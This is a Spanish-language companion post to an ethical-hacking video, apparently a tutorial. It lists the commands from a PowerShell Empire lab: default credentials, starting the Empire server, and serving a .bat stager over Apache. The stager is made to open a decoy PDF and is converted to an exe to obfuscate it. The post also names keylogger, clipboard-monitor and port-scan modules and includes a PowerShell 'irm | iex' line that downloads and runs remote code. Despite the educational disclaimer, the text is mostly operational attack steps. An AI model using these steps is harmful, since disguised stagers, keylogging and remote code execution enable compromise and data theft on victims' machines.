También hablaremos sobre cómo detectar, prevenir y defenderse de este tipo de ataques, tanto si eres principiante en ciberseguridad como si ya trabajas en el sector. Si estás estudiando hacking ético o buscas mejorar tus habilidades, te sugiero que esta es una demostración valiosa y realista de cómo se llevan a cabo los ataques en el mundo real.
Disclaimer / Descargo de responsabilidad: este canal es estrictamente educativo para aprender sobre ciberseguridad y Redes de Computadoras.
¡Ayudame con un café! Si te sirvió algún vídeo del canal y te gustaría colaborar con mi trabajo, podés "invitarme un cafecito", por muy poca plata :
Siempre es de agradecer algún tipo de donación para seguir adelante con el canal.

LABORATORIO

COMANDOS USADOS
Código: Seleccionar todo
empireadmin
password123
Levanta con este comando, tengo entendido que seria la parte cli
./ps-empire server
/etc/apache2/ports.conf
Puerto apache 8081 por defecto | Servicio Web
sudo service apache2 start
sudo mv launchclear2.bat /var/www/html
curl 192.168.10.219:8081/launchclear2.bat > launchclear2.bat
agregar al archivo .bat
start /b %~dp0LOQ_15IRX9_Spec.pdf
usar el bat converter to exe para ofuscarlo mas todavia
Modulos usados
dejar mensaje --------------> Powershell_trollsploit_message
KeyLogger --------------------> powershell_collection_keylogger
Clipboard monitor -------------> powershell_collection_clipboard_monitor
escanear puertos --------------> powershell_situational_awareness_network_portscan
start-process "powershell.exe" -argumentlist '-command',"irm https://www.leeholmes.com/projects/ps_html5/Invoke-PSHtml5.ps1 | iex"
https://github.com/BC-SECURITY/Empire
https://bc-security.gitbook.io/empire-w ... stallation
https://www.cyberciti.biz/faq/linux-apa ... ipbinding/
https://superuser.com/questions/1644520 ... ue-in-kali
Stagers
https://aceresponder.com/blog/exploitin ... -framework
VIDEO TUTORIAL
CyberSecurity,InfoSec,Ethical Hacking,Hacking Etico,Kali Linux,Red team,Pentesting,Vulnerability,Ingenieria Social,social engineering,sistemas de seguridad,Payloads,Network Hacking,Post Exploitation,Programming,OSINT,Cyber Seguridad